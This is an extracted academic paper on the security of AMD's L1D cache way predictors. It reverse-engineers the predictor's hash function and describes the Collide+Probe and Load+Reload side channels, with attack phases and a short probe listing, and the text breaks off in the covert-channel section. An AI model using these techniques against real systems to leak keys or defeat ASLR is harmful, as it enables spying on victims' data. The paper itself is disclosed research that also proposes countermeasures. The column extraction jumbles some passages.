Take A Way: Exploring the Security Implications of AMD’s Way Predictors

Moritz Lipp Vedad Hadžić Michael Schwarz Graz University of Technology Graz University of Technology Graz University of Technology Arthur Perais Clémentine Maurice Daniel Gruss Unaffiliated Univ Rennes, CNRS, IRISA Graz University of Technology ABSTRACT 1 INTRODUCTION To optimize the energy consumption and performance of their With caches, out-of-order execution, speculative execution, or si- CPUs, AMD introduced a way predictor for the L1- (L1D) cache multaneous multithreading (SMT), modern processors are equipped to predict in which cache way a certain address is located. Conse- with numerous features optimizing the system’s throughput and quently, only this way is accessed, significantly reducing the power power consumption. Despite their performance benefits, these op- consumption of the processor. timizations are often not designed with a central focus on security In this paper, we are the first to exploit the cache way predic- properties. Hence, microarchitectural attacks have exploited these tor. We reverse-engineered AMD’s L1D cache way predictor in optimizations to undermine the system’s security. from 2011 to 2019, resulting in two new attack Cache attacks on cryptographic algorithms were the first mi- techniques. With Collide+Probe, an attacker can monitor a vic- croarchitectural attacks [12, 42, 59]. Osvik et al. [58] showed that tim’s memory accesses without knowledge of physical addresses an attacker can observe the cache state at the granularity of a cache or shared memory when time-sharing a logical core. With Load+ set using Prime+Probe. Yarom et al. [81] proposed Flush+Reload, Reload, we exploit the way predictor to obtain highly-accurate a technique that can observe victim activity at a cache-line granu- memory-access traces of victims on the same physical core. While larity. Both Prime+Probe and Flush+Reload are generic techniques Load+Reload relies on shared memory, it does not invalidate the that allow implementing a variety of different attacks, e.g., on cryp- cache line, allowing stealthier attacks that do not induce any last- tographic algorithms [12, 25, 50, 54, 59, 65, 81], web server function level-cache evictions. calls [83], user input [31, 48, 82], and address layout [24]. Flush+ We evaluate our new side channel in different attack scenarios. Reload requires shared memory between the attacker and the vic- We demonstrate a covert channel with up to 588.9 kB/s, which we tim. When attacking the last-level cache, Prime+Probe requires also use in a Spectre attack to exfiltrate secret data from the kernel. it to be shared and inclusive. While some processors do not Furthermore, we present a key-recovery attack from a vulnerable have inclusive last-level caches anymore [80], AMD always focused cryptographic implementation. We also show an entropy-reducing on non-inclusive or exclusive last-level caches [38]. Without in- attack on ASLR of the kernel of a fully patched system, the clusivity and shared memory, these attacks do not apply to AMD hypervisor, and our own address space from JavaScript. Finally, we CPUs. propose countermeasures in software and hardware mitigating the With the recent transient-execution attacks, adversaries can di- presented attacks. rectly exfiltrate otherwise inaccessible data on the system [41, 49, 67, 73, 74]. However, AMD’s microarchitectures seem to be vul- CCS CONCEPTS nerable to only a few of them [6, 16]. Consequently, AMD CPUs • Security and privacy → Side-channel analysis and counter- do not require software mitigations with high performance penal- measures; Operating systems security. ties. Additionally, with the performance improvements of the latest microarchitectures, the share of AMD CPU’s used is currently in- ACM Reference Format: creasing in the cloud [7] and consumer desktops [34]. Moritz Lipp, Vedad Hadžić, Michael Schwarz, Arthur Perais, Clémentine Since the Bulldozer [3], AMD uses an L1D Maurice, and Daniel Gruss. 2020. Take A Way: Exploring the Security Im- plications of AMD’s Cache Way Predictors. In Proceedings of the 15th ACM cache way predictor in their processors. The predictor computes a Asia Conference on and Communications Security (ASIA CCS ’20), 휇Tag using an undocumented hash function on the virtual address. October 5–9, 2020, Taipei, Taiwan. ACM, New York, NY, USA, 13 pages. This 휇Tag is used to look up the L1D cache way in a prediction https://doi.org/10.1145/3320269.3384746 table. Hence, the CPU has to compare the cache tag in only one way instead of all possible ways, reducing the power consumption. Permission to make digital or hard copies of all or part of this work for personal or In this paper, we present the first attacks on cache way predictors. classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation For this purpose, we reverse-engineered the undocumented hash on the first page. Copyrights for components of this work owned by others than the function of AMD’s L1D cache way predictor in microarchitectures author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or from 2001 up to 2019. We discovered two different hash functions republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected]. that have been implemented in AMD’s way predictors. Knowledge ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan of these functions is the basis of our attack techniques. In the © 2020 Copyright held by the owner/author(s). Publication rights licensed to ACM. first attack technique, Collide+Probe, we exploit 휇Tag collisions of ACM ISBN 978-1-4503-6750-9/20/10...$15.00 https://doi.org/10.1145/3320269.3384746 ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al. virtual addresses to monitor the memory accesses of a victim time- 2 BACKGROUND sharing the same logical core. Collide+Probe does not require shared In this section, we provide background on CPU caches, cache at- memory between the victim and the attacker, unlike Flush+Reload, tacks, high-resolution timing sources, simultaneous multithreading and no knowledge of physical addresses, unlike Prime+Probe. In the (SMT), and way prediction. second attack technique, Load+Reload, we exploit the property that a physical memory location can only reside once in the L1D cache. 2.1 CPU Caches Thus, accessing the same location with a different virtual address evicts the location from the L1D cache. This allows an attacker to CPU caches are a type of memory that is small and fast, that the monitor memory accesses on a victim, even if the victim runs on a CPU uses to store copies of data from main memory to hide the sibling logical core. Load+Reload is on par with Flush+Reload in latency of memory accesses. Modern CPUs have multiple cache terms of accuracy and can achieve a higher temporal resolution levels, typically three, varying in size and latency: the L1 cache is as it does not invalidate a cache line in the entire cache hierarchy. the smallest and fastest, while the L3 cache, also called the last-level This allows stealthier attacks that do not induce last-level-cache cache, is bigger and slower. evictions. Modern caches are set-associative, i.e., a cache line is stored in a We demonstrate the implications of Collide+Probe and Load+ fixed set determined by either its virtual or physical address. TheL1 Reload in different attack scenarios. First, we implement a covert cache typically has 8 ways per set, and the last-level cache has 12 to channel between two processes with a transmission rate of up to 20 ways, depending on the size of the cache. Each line can be stored 588.9 kB/s outperforming state-of-the-art covert channels. Second, in any of the ways of a cache set, as determined by the replacement we use 휇Tag collisions to reduce the entropy of different ASLR policy. While the replacement policy for the L1 and L2 data cache implementations. We break kernel ASLR on a fully updated Linux on Intel is most of the time pseudo least-recently-used (LRU) [1], system and demonstrate entropy reduction on user-space appli- the replacement policy for the last-level cache (LLC) can differ [78]. cations, the hypervisor, and even on our own address space from Intel CPUs until use pseudo least-recently-used (LRU), sandboxed JavaScript. Furthermore, we successfully recover the for newer microarchitectures it is undocumented [78]. secret key using Collide+Probe on an AES T-table implementation. The last-level cache is physically indexed and shared across Finally, we use Collide+Probe as a covert channel in a Spectre attack cores of the same CPU. In most Intel implementations, it is also to exfiltrate secret data from the kernel. While we still use acache- inclusive of L1 and L2, which means that all data in L1 and L2 is based covert channel, in contrast to previous attacks [41, 44, 51, 69], also stored in the last-level cache. On AMD processors, the L1D we do not rely on shared memory between the user application and cache is virtually indexed and physically tagged (VIPT). On AMD the kernel. We propose different countermeasures in software and processors, the last-level cache is a non-inclusive victim cache while hardware, mitigating Collide+Probe and Load+Reload on current on most Intel CPUs it is inclusive. To maintain the inclusiveness systems and in future designs. property, every line evicted from the last-level cache is also evicted from L1 and L2. The last-level cache, though shared across cores, Contributions. The main contributions are as follows: is also divided into slices. The undocumented hash function on (1) We reverse engineer the L1D cache way predictor of AMD Intel CPUs that maps physical addresses to slices has been reverse- CPUs and provide the addressing functions for virtually all engineered [52]. microarchitectures. (2) We uncover the L1D cache way predictor as a source of 2.2 Cache Attacks side-channel leakage and present two new cache-attack tech- Cache attacks are based on the timing difference between accessing niques, Collide+Probe and Load+Reload. cached and non-cached memory. They can be leveraged to build (3) We show that Collide+Probe is on par with Flush+Reload side-channel attacks and covert channels. Among cache attacks, and Prime+Probe but works in scenarios where other cache access-driven attacks are the most powerful ones, where an attacker attacks fail. monitors its own activity to infer the activity of its victim. More (4) We demonstrate and evaluate our attacks in sandboxed specifically, an attacker detects which cache lines or cache setsthe JavaScript and virtualized cloud environments. victim has accessed. Access-driven attacks can further be categorized into two types, Responsible Disclosure. We responsibly disclosed our findings to depending on whether or not the attacker shares memory with AMD on August 23rd, 2019. its victim, e.g., using a shared library or memory deduplication. Flush+Reload [81], Evict+Reload [31] and Flush+Flush [30] all rely Outline. Section 2 provides background information on CPU on shared memory that is also shared in the cache to infer whether caches, cache attacks, way prediction, and simultaneous multi- the victim accessed a particular cache line. The attacker evicts the threading (SMT). Section 3 describes the reverse engineering of the shared data either by using the clflush instruction (Flush+Reload way predictor that is necessary for our Collide+Probe and Load+ and Flush+Flush), or by accessing congruent addresses, i.e., cache Reload attack techniques outlined in Section 4. In Section 5, we lines that belong to the same cache set (Evict+Reload). These at- evaluate the attack techniques in different scenarios. Section 6 dis- tacks have a very fine granularityi.e. ( , a 64- memory region), cusses the interactions between the way predictor and other CPU but they are not applicable if shared memory is not available in the features. We propose countermeasures in Section 7 and conclude corresponding environment. Especially in the cloud, shared mem- our work in Section 8. ory is usually not available across VMs as memory deduplication is Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan disabled for security concerns [75]. Irazoqui et al. [38] showed that unprivileged high-resolution timers are unavailable. Schwarz et al. an attack similar to Flush+Reload is also possible in a cross-CPU [65] showed that a counting can have a higher resolution attack. It exploits that cache invalidations (e.g., from clflush) are than the rdtsc instruction on Intel CPUs. A counting thread con- propagated to all physical processors installed in the same system. stantly increments a global variable used as a timestamp without When reloading the data, as in Flush+Reload, they can distinguish relying on microarchitectural specifics and, thus, can also be used the timing difference between a cache hit in a remote processor on AMD CPUs. and a cache miss, which goes to DRAM. The second type of access-driven attacks, called Prime+Probe [37, 2.4 Simultaneous Multithreading (SMT) 50, 59], does not rely on shared memory and is, thus, applicable to Simultaneous Multithreading (SMT) allows optimizing the effi- more restrictive environments. As the attacker has no shared cache ciency of superscalar CPUs. SMT enables multiple independent line with the victim, the clflush instruction cannot be used. Thus, threads to run in parallel on the same physical core sharing the the attacker has to access congruent addresses instead (cf. Evict+ same resources, e.g., execution units and buffers. This allows uti- Reload). The granularity of the attack is coarser, i.e., an attacker only lizing the available resources better, increasing the efficiency and obtains information about the accessed cache set. Hence, this attack throughput of the processor. While on an architectural level, the is more susceptible to noise. In addition to the noise caused by other threads are isolated from each other and cannot access data of other processes, the replacement policy makes it hard to guarantee that threads, on a microarchitectural level, the same physical resources data is actually evicted from a cache set [29]. may be used. Intel introduced SMT as Hyperthreading in 2002. AMD With the general development to switch from inclusive caches to introduced 2-way SMT with the Zen microarchitecture in 2017. non-inclusive caches, Intel introduced cache directories. Yan et al. Recently, microarchitectural attacks also targeted different shared [80] showed that the cache directory is still inclusive, and an at- resources: the TLB [23], store buffer [15], execution ports [8, 13], tacker can evict a cache directory entry of the victim to invalidate fill-buffers [67, 74], and load ports [67, 74]. the corresponding cache line. This allows mounting Prime+Probe and Evict+Reload attacks on the cache directory. They also ana- 2.5 Way Prediction lyzed whether the same attack works on AMD Piledriver and Zen To look up a cache line in a set-associative cache, bits in the address processors and discovered that it does not, because these processors determine in which set the cache line is located. With an 푛-way either do not use a directory or use a directory with high associa- cache, 푛 possible entries need to be checked for a tag match. To tivity, preventing cross-core eviction either way. Thus, it remains avoid wasting power for 푛 comparisons leading to a single match, to be answered what types of eviction-based attacks are feasible on Inoue et al. [36] presented way prediction for set-associative caches. AMD processors and on which microarchitectural structures. Instead of checking all ways of the cache, a way is predicted, and only this entry is checked for a tag match. As only one way is 2.3 High-resolution Timing activated, the power consumption is reduced. If the prediction is correct, the access has been completed, and access times similar to For most cache attacks, the attacker requires a method to measure a direct-mapped cache are achieved. If the prediction is incorrect, a rdtsc timing differences in the range of a few CPU cycles. The normal associative check has to be performed. instruction provides unprivileged access to a model-specific register We only describe AMD’s way predictor [5, 22] in more detail returning the current cycle count and is commonly used for cache in the following section. However, other CPU manufacturers hold attacks on Intel CPUs. Using this instruction, an attacker can get patents for cache way prediction as well [56, 63]. CPU’s like the timestamps with a resolution between 1 and 3 cycles on modern Alpha 21264 [40] also implement way prediction to combine the CPUs. On AMD CPUs, this register has a cycle-accurate resolution advantages of set-associative caches and the fast access time of a until the Zen microarchitecture. Since then, it has a significantly direct-mapped cache. lower resolution as it is only updated every 20 to 35 cycles (cf. Appendix A). Thus, rdtsc is only sufficient if the attacker can 3 REVERSE-ENGINEERING AMDS WAY repeat the measurement and use the average timing differences PREDICTOR over all executions. If an attacker tries to monitor one-time events, the rdtsc instruction on AMD cannot directly be used to observe In this section, we explain how to reverse-engineer the L1D way timing differences, which are only a few CPU cycles. predictor used in AMD CPUs since the Bulldozer microarchitecture. The AMD microarchitecture provides the Actual Perfor- First, we explain how the AMD L1D way predictor predicts the mance Frequency Clock Counter (APERF counter) [4] which can be L1D cache way based on hashed virtual addresses. Second, we used to improve the accuracy of the timestamp counter. However, reverse-engineer the undocumented hash function used for the way it can only be accessed in kernel mode. Although other timing prediction in different microarchitectures. With the knowledge of primitives provided by the kernel, such as get_monotonic_time, the hash function and how the L1D way predictor works, we can provide nanosecond resolution, they can be more noisy and still then build powerful side-channel attacks exploiting AMD’s way not sufficiently accurate to observe timing differences, whichare predictor. only a few CPU cycles. Hence, on more recent AMD CPUs, it is necessary to resort to a 3.1 Way Predictor different method for timing measurements. Lipp48 etal.[ ] showed Since the AMD Bulldozer microarchitecture, AMD uses a way pre- that counting threads can be used on ARM-based devices where dictor in the L1 data cache [3]. By predicting the cache way, the CPU ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

Way 1 Way 푛 Creating Sets. With the ability to detect conflicts, we can build

Set 휇Tag ... 휇Tag 푁 sets representing the number of entries in the 휇Tag table. First,

VA we create a pool 푣 of virtual addresses, which all map to the same cache set, i.e., where bits 6 to 11 of the virtual address are the same.

Hash We start with one set 푆0 containing one random virtual address = = 휇Tag out of the pool 푣. For each other randomly-picked address 푣푥 , we measure the access time while alternatively accessing 푣푥 and an Way Prediction Early Miss address from each set 푆0...푛. If we encounter a high access time, we measure conflicts and add 푣푥 to that set. If 푣푥 does not conflict with L1D L2 any existing set, we create a new set 푆푛+1 containing 푣푥 . In our experiments, we recovered 256 sets. Due to measurement Figure 1: Simplified illustration of AMD’s way predictor. errors caused by system noise, there are sets with single entries that can be discarded. Furthermore, to retrieve all sets, we need to make sure to test against virtual addresses where a wide range of only has to compare the cache tag in one way instead of all ways. bits is set covering the yet unknown bits used by the hash function. While this reduces the power consumption of an L1D lookup [5], it may increase the latency in the case of a misprediction. Recovering the Hash Function. Every virtual address, which is in Every cache line in the L1D cache is tagged with a linear-address- the same set, produces the same hash. To recover the hash function, based 휇Tag [5, 22]. This 휇Tag is computed using an undocumented we need to find which bits in the virtual address are used forthe hash function, which takes the virtual address as the input. For 8 output bits that map to the 256 sets. Due to its linearity, each every memory load, the way predictor predicts the cache way of output bit of the hash function can be expressed as a series of XORs every memory load based on this 휇Tag. As the virtual address, and of bits in the virtual address. Hence, we can express the virtual thus the 휇Tag, is known before the physical address, the CPU does addresses as an over-determined linear equation system in finite not have to wait for the TLB lookup. Figure 1 illustrates AMD’s field 2, i.e., GF(2). The solutions of the equation system are then way predictor. If there is no match for the calculated 휇Tag, an early linear functions that produce the 휇Tag from the virtual address. miss is detected, and a request to L2 issued. To build the equation system, we use each of the virtual addresses Aliased cache lines can induce performance penalties, i.e., two in the 256 sets. For every virtual address, the 푏 bits of the virtual different virtual addresses map to the same physical location. VIPT address 푎 are the coefficients, and the bits of the hash function 푥 are caches with a size lower or equal the number of ways multiplied by the unknown. The right-hand side of the equation 푦 is the same for the page size behave functionally like PIPT caches. Hence, there are all addresses in the set. Hence, for every address 푎 in set 푠, we get no duplicates for aliased addresses and, thus, in such a case where an equation of the form 푎푏−1푥푏−1 ⊕ 푎푏−2푥푏−2 ⊕ · · · ⊕ 푎12푥12 = 푦푠 . data is loaded from an aliased address, the load sees an L1D cache While the least-significant bits 0-5 define the cache line offset, miss and thus loads the data from the L2 data cache [5]. If there note that bits 6-11 determine the cache set and are not used for the are multiple memory loads from aliased virtual addresses, they all 휇Tag computation [5]. To solve the equation system, we used the suffer an L1D cache miss. The reason is that every load updates Z3 SMT solver. Every solution vector represents a function which the 휇Tag and thus ensures that any other aliased address sees an XORs the virtual-address bits that correspond to ‘1’-bits in the L1D cache miss [5]. In addition, if two different virtual addresses solution vector. The hash function is the set of linearly independent yield the same 휇Tag, accessing one after the other yields a conflict functions, i.e., every linearly independent function yields one bit in the 휇Tag table. Thus, an L1D cache miss is suffered, and the data of the hash function. The order of the bits cannot be recovered. is loaded from the L2 data cache. However, this is not relevant, as we are only interested whether addresses collide, not in their numeric 휇Tag value. 3.2 Hash Function We successfully recovered the undocumented 휇Tag hash function on the AMD Zen, Zen+ and microarchitecture. The function The L1D way predictor computes a hash (휇Tag) from the virtual illustrated in Figure 3a uses bits 12 to 27 to produce an 8-bit value address, which is used for the lookup to the way-predictor table. mapping to one of the 256 sets: We assume that this undocumented hash function is linear based on the knowledge of other such hash functions, e.g., the cache-slice ℎ(푣) = (푣12 ⊕ 푣27) ∥ (푣13 ⊕ 푣26) ∥ (푣14 ⊕ 푣25) ∥ (푣15 ⊕ 푣20) ∥ function of Intel CPUs [52], the DRAM-mapping function of Intel, (푣16 ⊕ 푣21) ∥ (푣17 ⊕ 푣22) ∥ (푣18 ⊕ 푣23) ∥ (푣19 ⊕ 푣24) ARM, and AMD CPUs [2, 60, 70], or the hash function for indirect branch prediction on Intel CPUs [41]. Moreover, we expect the size We recovered the same function for various models of the AMD of the 휇Tag to be a power of 2, resulting in a linear function. Zen microarchitectures that are listed in Table 1. For the Bulldozer We rely on 휇Tag collisions to reverse-engineer the hash function. microarchitecture (FX-4100), the Piledriver microarchitecture (FX- We pick two random virtual addresses that map to the same cache 8350), and the Steamroller microarchitecture (A10-7870K), the hash set. If the two addresses have the same 휇Tag, repeatedly accessing function uses the same bits but in a different combination Figure 3b. them one after the other results in conflicts. As the data is then loaded from the L2 cache, we can either measure an increased access 3.3 Simultaneous Multithreading time or observe an increased number in the performance counter As AMD introduced simultaneous multithreading starting with the for L1 misses, as illustrated in Figure 2. Zen microarchitecture, the filed patent22 [ ] does not cover any Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan

2,000 Non-colliding addresses Hence, we extend the experiment in accessing addresses mapping 1,500 Colliding addresses to all possible 휇Tags on one hardware thread (and all possible cache 1,000 sets). While we repeatedly accessed one of these addresses on one hardware thread, we measure the number of L1 misses to a single 500 Measurements virtual address on the sibling thread. However, we are not able to 0 observe any collisions and, thus, conclude that either individual 0 50 100 150 200 structures are used per thread or that they are shared but tagged for Access time (increments) each thread. The only exceptions are aliased loads as the hardware updates the 휇Tag in the aliased way (see Section 3.1). Figure 2: Measured duration of 250 alternating accesses to In another experiment, we measure access times of two virtual addresses with and without the same 휇Tag. addresses that are mapped to the same physical address. As docu- mented [5], loads to an aliased address see an L1D cache miss and,

푓1 thus, load the data from the L2 data cache. While we verified this 푓2 behavior, we additionally observed that this is also the case if the 푓3 other thread performs the other load. Hence, the structure used is ... 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 ... searched by the sibling thread, suggesting a competitively shared 푓4 푓5 structure that is tagged with the hardware threads. 푓6 푓7 푓8 4 USING THE WAY PREDICTOR FOR SIDE (a) Zen, Zen+, Zen 2 CHANNELS 푓1 In this section, we present two novel side channels that leverage 푓2 푓3 AMD’s L1D cache way predictor. With Collide+Probe, we moni- 푓4 푓5 tor memory accesses of a victim’s process without requiring the 푓6 푓7 knowledge of physical addresses. With Load+Reload, while relying 푓8 on shared memory similar to Flush+Reload, we can monitor mem- ... 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 ... ory accesses of a victim’s process running on the sibling hardware thread without invalidating the targeted cache line from the entire (b) Bulldozer, Piledriver, Steamroller cache hierarchy.

Figure 3: The recovered hash functions use bits 12 to 27 of 4.1 Collide+Probe the virtual address to compute the 휇Tag. Collide+Probe is a new cache side channel exploiting 휇Tag collisions in AMD’s L1D cache way predictor. As described in Section 3, the way predictor uses virtual-address-based 휇Tags to predict the L1D insights on how the way predictor might handle multiple threads. cache way. If an address is accessed, the 휇Tag is computed, and the While the way predictor has been used since the Bulldozer microar- way-predictor entry for this 휇Tag is updated. If a subsequent access chitecture [3], parts of the way predictor have only been docu- to a different address with the same 휇Tag is performed, a 휇Tag mented with the release of the Zen microarchitecture [5]. However, collision occurs, and the data has to be loaded from the L2D cache, the influence of simultaneous multithreading is not mentioned. increasing the access time. With Collide+Probe, we exploit this Typically, two sibling threads can either share a hardware struc- timing difference to monitor accesses to such colliding addresses. ture competitively with the option to tag entries or by statically Threat Model. For this attack, we assume that the attacker has un- partitioning them. For instance, on the Zen microarchitecture, ex- privileged native code execution on the target machine and runs on ecution units, schedulers, or the cache are competitively shared, the same logical CPU core as the victim. Furthermore, the attacker and the store queue and retire queue are statically partitioned [17]. can force the execution of the victim’s code, e.g., via a function call Although the load queue, as well as the instruction and data TLB, in a library or a system call. are competitively shared between the threads, the data in these structures can only be accessed by the thread owning it. Setup. The attacker first chooses a virtual address 푣 of the victim Under the assumption that the data structures of the way pre- that should be monitored for accesses. This can be an arbitrary dictor are competitively shared between threads, one thread could valid address in the victim’s address space. There are no constraints directly influence the sibling thread, enabling cross-thread attacks. in choosing the address. The attacker can then compute the 휇Tag We validate this assumption by accessing two addresses with the 휇푣 of the target address using the hash function from Section 3.2. same 휇Tag on both threads. However, we do not observe collisions, We assume that ASLR is either not active or has already been neither by measuring the access time nor in the number of L1 misses. broken (cf. Section 5.2). However, although with ASLR, the actual While we reverse-engineered the same mapping function (see Sec- virtual address used in the victim’s process are typically unknown tion 3.2) for both threads, the possibility remains that additional to the attacker, it is still possible to mount an attack. Instead of per-thread information is used for selecting the data-structure entry, choosing a virtual address, the attacker initially performs a cache allowing one thread to evict entries of the other. template attack [31] to detect which of 256 possible 휇Tags should ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

be monitored. Similar to Prime+Probe [58], where the attacker 1 access(colliding_address); monitors the activity of cache sets, the attacker monitors 휇Tag 2 run_victim(); 3 size_t begin= get _time(); collisions while triggering the victim. 4 access(colliding_address); 5 size_t end= get _time() − begin; Attack. To mount a Collide+Probe attack, the attacker selects 6 if ((end − begin) > THRESHOLD) report_event(); a virtual address 푣 ′ in its own address space that yields the same Listing 1: Implementation of the Collide+Probe attack 휇Tag 휇푣′ as the target address 푣, i.e., 휇푣 = 휇푣′ . As there are only 256 different 휇Tags, this can easily be done by randomly choosing addresses until the chosen address has the same 휇Tag. Moreover, ′ both 푣 and 푣 have to be in the same cache set. However, this is easily Probe over Prime+Probe is that a single memory load is enough satisfiable, as the cache set is determined by bits 6-11 of thevirtual to guarantee that a subsequent load with the same 휇Tag is served address. The attack consists of 3 phases performed repeatedly: from the L2 cache. With Prime+Probe, multiple loads are required to Phase 1: Collide. In the first phase, the attacker accesses the ensure that the target address is evicted from the cache. In modern ′ pre-computed address 푣 and, thus, updates the way predictor. The Prime+Probe attacks, the last-level cache is targeted [37, 48, 50, 66], ′ way predictor associates the cache line of 푣 with its 휇Tag 휇푣′ and and knowledge of physical addresses is required to compute both subsequent memory accesses with the same 휇Tag are predicted to the cache set and cache slice [52]. While Collide+Probe requires be in the same cache way. Since the victim’s address 푣 has the same knowledge of virtual addresses, they are typically easier to get than 휇Tag (휇푣 = 휇푣′ ), the 휇Tag of that cache line is marked invalid and physical addresses. In contrast to Flush+Reload, Collide+Probe does the data is effectively inaccessible from the L1D cache. neither require any specific instructions like clflush nor shared Phase 2: Scheduling the victim. In the second phase, the memory between the victim and the attacker. A disadvantage is victim is scheduled to perform its operations. If the victim does not that distinguishing L1D from L2 hits in Collide+Probe requires a access the monitored address 푣, the way predictor remains in the timing primitive with higher precision than required to distinguish same state as set up by the attacker. Thus, the attacker’s data is cache hits from misses in Flush+Reload. still accessible from the L1D cache. However, if the victim performs an access to the monitored address 푣, the way predictor is updated 4.2 Load+Reload again causing the attacker’s data to be inaccessible from L1D. Load+Reload exploits the way predictor’s behavior for aliased ad- Phase 3: Probe. In the third and last phase of the attack, the ′ dress, i.e., virtual addresses mapping to the same physical address. attacker measures the access time to the pre-computed address 푣 . If When accessing data through a virtual-address alias, the data is the victim has not accessed the monitored address 푣, the data of the ′ always requested from the L2 cache instead of the L1D cache [5]. By pre-computed address 푣 is still accessible from the L1D cache and monitoring the performance counter for L1 misses, we also observe the way prediction is correct. Thus, the measured access time is fast. this behavior across hardware threads. Consequently, this allows If the victim has accessed the monitored address 푣 and thus changed one thread to evict shared data used by the sibling thread with a the state of the way predictor, the attacker suffers an L1D cache miss single load. Although the requested data is stored in the L1D cache, when accessing 푣 ′, as the prediction is now incorrect. The data of ′ it remains inaccessible for the other thread and, thus, introduces a the pre-computed address 푣 is loaded from the L2 cache and, thus, timing difference when it is accessed. the measured access time is slow. By distinguishing between these cases, the attacker can deduce whether the victim has accessed the Threat Model. For this attack, we assume that the attacker has targeted data. unprivileged native code execution on the target machine. The Listing 1 shows an implementation of the Collide+Probe attack attacker and victim run simultaneously on the same physical but where the colliding address colliding_address is computed be- different logical CPU thread. The attack target is a memory location forehand. The code closely follows the three attack phases. First, with virtual address 푣 shared between the attacker and victim, e.g., the colliding address is accessed. Then, the victim is scheduled, il- a shared library. lustrated by the run_victim function. Afterwards, the access time Attack. Load+Reload exploits the timing difference when access- to the same address is measured where the get_time function is ing a virtual-address alias 푣 ′ to build a cross-thread attack on shared implemented using a timing source discussed in Section 2.3. The memory. The attack consists of 3 phases: measured access time allows the attacker to distinguish between an Phase 1: Load. In contrast to Flush+Reload, where the targeted L1D cache hit and an L2-cache hit and, thus, deduce if the victim address 푣 is flushed from the cache hierarchy, Load+Reload loads has accessed the targeted address. As other accesses with the same an address 푣 ′ with the same physical tag as 푣 in the first phase. cache set influence the measurements, the attacker can repeat the Thereby, it renders the cache line containing 푣 inaccessible from experiment to average out the measured noise. the L1D cache for the sibling thread. Comparison to Other Cache Attacks. Finally, we want to discuss Phase 2: Scheduling the victim. In the second phase, the victim the advantages and disadvantages of the Collide+Probe attack in process is scheduled. If the victim process accesses the targeted comparison to other cache side-channel attacks. In contrast to cache line with address 푣, it sees an L1D cache miss. As a result, it Prime+Probe, no knowledge of physical addresses is required as the loads the data from the L2 cache, invalidating the attacker’s cache way predictor uses the virtual address to compute 휇Tags. Thus, with line with address 푣 ′ in the process. native code execution, an attacker can find addresses corresponding Phase 3: Reload. In the third phase, the attacker measures the to a specific 휇Tag without any effort. Another advantage of Collide+ access time to the address 푣 ′. If the victim process has accessed the Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan cache line with address 푣, the attacker observes an L1D cache miss Table 1: Tested CPUs with their microarchitecture (휇-arch.) and loads the data from the L2 cache, resulting in a higher access and whether they have a way predictor (WP). time. Otherwise, if the victim has not accessed the cache line with address 푣, it is still accessible in the L1D cache for the attacker and, Setup CPU 휇-arch. WP thus, a lower access time is measured. By distinguishing between Lab AMD 64 X2 3800+ K8 ✗ both cases, the attacker can deduce whether the victim has accessed Lab AMD Turion II Neo N40L K10 ✗ 푣 the address . Lab AMD Phenom II X6 1055T K10 ✗ ✗ Comparison with Flush+Reload. While Flush+Reload invalidates a Lab AMD E-450 Bobcat Lab AMD Athlon 5350 Jaguar ✗ cache line from the entire cache hierarchy, Load+Reload only evicts Lab AMD FX-4100 Bulldozer ✓ the data for the sibling thread from the L1D. Thus, Load+Reload is Lab AMD FX-8350 Piledriver ✓ limited to cross-thread scenarios, while Flush+Reload is applicable Lab AMD A10-7870K Steamroller ✓ to cross-core scenarios too. Lab AMD Ryzen Threadripper 1920X Zen ✓ Lab AMD Ryzen Threadripper 1950X Zen ✓ 5 CASE STUDIES Lab AMD Ryzen Threadripper 1700X Zen ✓ To demonstrate the impact of the side channel introduced by the Lab AMD Ryzen Threadripper 2970WX Zen+ ✓ 휇Tag, we implement different attack scenarios. In Section 5.1, we Lab AMD Ryzen 7 3700X Zen 2 ✓ implement a covert channel between two processes with a transmis- Cloud AMD 7401p Zen ✓ sion rate of up to 588.9 kB/s outperforming state-of-the-art covert Cloud AMD EPYC 7571 Zen ✓ channels. In Section 5.2, we break kernel ASLR, demonstrate how user-space ASLR can be weakened, and reduce the ASLR entropy of the hypervisor in a virtual-machine setting. In Section 5.3, we use Collide+Probe as a covert channel to extract secret data from To encode a 1-bit to transmit, the sender accesses address 푣푆 . the kernel in a Spectre attack. In Section 5.4, we recover secret keys To transmit a 0-bit, the sender does not access address 푣푆 . The in AES T-table implementations. receiving end decodes the transmitted information by measuring the access time when loading address 푣푅. If the sender has accessed Timing Measurement. As explained in Section 2.3, we cannot rely address 푣푆 to transmit a 1, the collision caused by the same 휇Tag on the rdtsc instruction for high-resolution timestamps on AMD of 푣푆 and 푣푅 results in a slow access time for the receiver. If the CPUs since the Zen microarchitecture. As we use recent AMD sender has not accessed address 푣푆 , no collision caused the address CPUs for our evaluation, we use a counting thread (cf. Section 2.3) 푣푅 to be evicted from L1D and, thus, the access time is fast. This running on the sibling logical CPU core for most of our experiments timing difference allows the receiver to decode the transmitted bit. if applicable. In other cases, e.g., a covert channel scenario, the Different cache-based covert channels use the same side chan- counting thread runs on a different physical CPU core. nel to transmit multiple bits at once. For instance, different cache lines [30, 48] or different cache sets [48, 53] are used to encode Environment. We evaluate our attacks on different environments one bit of information on its own. We extended the described 휇Tag listed in Table 1, with CPUs from K8 (released 2013) to Zen 2 (re- covert channel to transmit multiple bits in parallel by utilizing mul- leased in 2019). We have reverse-engineered 2 unique hash func- tiple cache sets. Instead of decoding the transmitted bit based on tions, as described in Section 3. One is the same for all Zen microar- the timing difference of one address, we use two addresses intwo chitectures, and the other is the same for all previous microarchi- cache sets for every bit we transmit: One to represent a 1-bit and tectures with a way predictor. the other to represent the 0-bit. As the L1D has 64 cache sets, we can transmit up to 32 bit in parallel without reusing cache sets. 5.1 Covert Channel A covert channel is a communication channel between two parties Performance Evaluation. We evaluated the transmission 